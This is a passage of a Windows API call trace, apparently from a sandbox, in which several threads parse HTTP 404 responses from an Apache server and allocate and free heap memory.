HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 652 os_tid = 0x19d0 [0320.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.683] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.683] GetProcessHeap () returned 0x6a0000 [0320.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0320.683] GetProcessHeap () returned 0x6a0000 [0320.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0320.683] GetProcessHeap () returned 0x6a0000 [0320.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 653 os_tid = 0x19d4 [0320.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.885] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.886] GetProcessHeap () returned 0x6a0000 [0320.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0320.886] GetProcessHeap () returned 0x6a0000 [0320.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0320.886] GetProcessHeap () returned 0x6a0000 [0320.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 654 os_tid = 0x19d8 [0321.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.074] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.074] GetProcessHeap () returned 0x6a0000 [0321.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0321.074] GetProcessHeap () returned 0x6a0000 [0321.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0321.074] GetProcessHeap () returned 0x6a0000 [0321.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 655 os_tid = 0x19dc [0321.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.281] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.281] GetProcessHeap () returned 0x6a0000 [0321.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0321.281] GetProcessHeap () returned 0x6a0000 [0321.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0321.281] GetProcessHeap () returned 0x6a0000 [0321.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 656 os_tid = 0x19e0 [0321.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.470] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.470] GetProcessHeap () returned 0x6a0000 [0321.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0321.470] GetProcessHeap () returned 0x6a0000 [0321.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0321.470] GetProcessHeap () returned 0x6a0000 [0321.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 657 os_tid = 0x19e4 [0321.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.655] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.655] GetProcessHeap () returned 0x6a0000 [0321.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0321.655] GetProcessHeap () returned 0x6a0000 [0321.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0321.655] GetProcessHeap () returned 0x6a0000 [0321.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 658 os_tid = 0x19e8 [0321.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.891] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.891] GetProcessHeap () returned 0x6a0000 [0321.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0321.891] GetProcessHeap () returned 0x6a0000 [0321.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0321.892] GetProcessHeap () returned 0x6a0000 [0321.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1